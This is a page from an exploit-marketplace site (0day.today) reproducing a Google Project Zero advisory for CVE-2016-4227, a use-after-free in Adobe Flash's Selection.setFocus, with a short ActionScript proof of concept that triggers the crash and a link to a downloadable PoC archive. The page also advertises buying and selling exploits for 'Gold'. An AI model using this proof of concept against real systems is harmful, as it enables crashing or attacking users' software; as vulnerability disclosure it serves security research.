[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ piattaforma ]  [ pentest ]  [ cerca ]  [ faq ]  [ contatti ]  [ stile ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Official Facebook
0day.today Exploit DB Official Twitter
0day.today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Il più grande database di exploit nel mondo.
Seleziona la tua lingua:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Cose che dovresti sapere du questo:

Utilizziamo un dominio principale DOMAIN_LINK

Se vuoi acquistare l'exploit o ottenerlo, devi comprare i Gold.
We accept currencies: [contact admin to find more]
           
Non vogliamo che utilizzi i tool di hacking per atttività illecite sul nostro sito web, quindi ogni azione può avere effetti illegali su utenti e sul nostro sito web verrai bannato. ed il tuo account con i tuoi dati verranno distrutti.

L'amministrazione del sito usa contatti ufficiali. Attenzione agli istruttori!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Sono un'utente registrato su 0day.today. Non voglio più vedere questa finestra in futuro.
Cosa fare prima?
  1. Leggere il [ accordo ]
  2. Leggere il [ Submit ] regole
  3. Visita il [ faq ] page
  4. [ Registrati ] profilo
  5. ottieni [ Oro ]
  6. Se vuoi [ vendere ]
  7. Se vuoi [ comprare ]
  8. se hai perso [ Account ]
  9. Qualsiasi domanda [ [email protected] ]


links principali


Ci puoi contattare tramite

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ Ripristina ]
Contattaci
Ci puoi contattare tramite:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today Exploits Market and 0day Exploits Database

Adobe Flash - Selection.setFocus Use-After-Free

Autore
Google Security Research
Rischio
[
Security Risk Medium
]
0day-ID
0day-ID-26124
Categoria
dos / poc
Data inserimento
28-08-2016
CVE
CVE-2016-4227
Piattaforma
multiple
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841
 
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
 
A minimal PoC follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap here
 
    }
 
A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip

#  0day.today [2024-07-02]  #
0day.today Exploit Database compra e vendi exploits (local, remote, DoS, PoC, etc.)
Sinviare tutte le richieste di mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team